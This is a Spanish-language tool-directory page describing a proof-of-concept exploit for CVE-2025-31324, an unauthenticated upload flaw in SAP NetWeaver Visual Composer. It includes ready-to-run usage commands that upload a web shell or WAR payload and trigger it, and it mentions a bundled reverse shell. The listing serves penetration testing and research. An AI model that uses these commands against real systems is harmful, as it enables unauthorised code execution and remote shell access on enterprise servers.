Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31324_PoC — Prueba de concepto para CVE-2025-31324: Subida no autenticada en SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Herramientas/GitHubGitHub/odst-forge/cve-2025-31324_poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

Prueba de concepto para CVE-2025-31324: Subida no autenticada en SAP NetWeaver Visual Composer Metadata Uploader

Ver Repositorio
62hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-31324_PoC

Prueba de concepto para CVE-2025-31324: Carga no autenticada en SAP NetWeaver Visual Composer Metadata Uploader

Este script realiza:

  1. Carga de archivo al endpoint vulnerable (a través del host/puerto de carga)
  2. Activación opcional mediante HTTP GET (a través del host/puerto de activación)
  3. Validación/registro básico de la respuesta

Ejemplo de uso: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

También tienes la posibilidad de subir un archivo .war si así es como prefieres ejecutarlo. cache.jsp es una reverse shell que te dará acceso una vez dentro del sistema. (Todavía estoy resolviendo problemas con eso)

Aviso legal

Esto está pensado únicamente para fines educativos y no debe utilizarse para actividades maliciosas. Asegúrate siempre de tener los permisos necesarios y de seguir las pautas éticas al probar o investigar vulnerabilidades de seguridad.

Si tienes alguna pregunta o necesitas aclaraciones, no dudes en contactarme. ¡Mantente seguro y protegido!

Descargar herramienta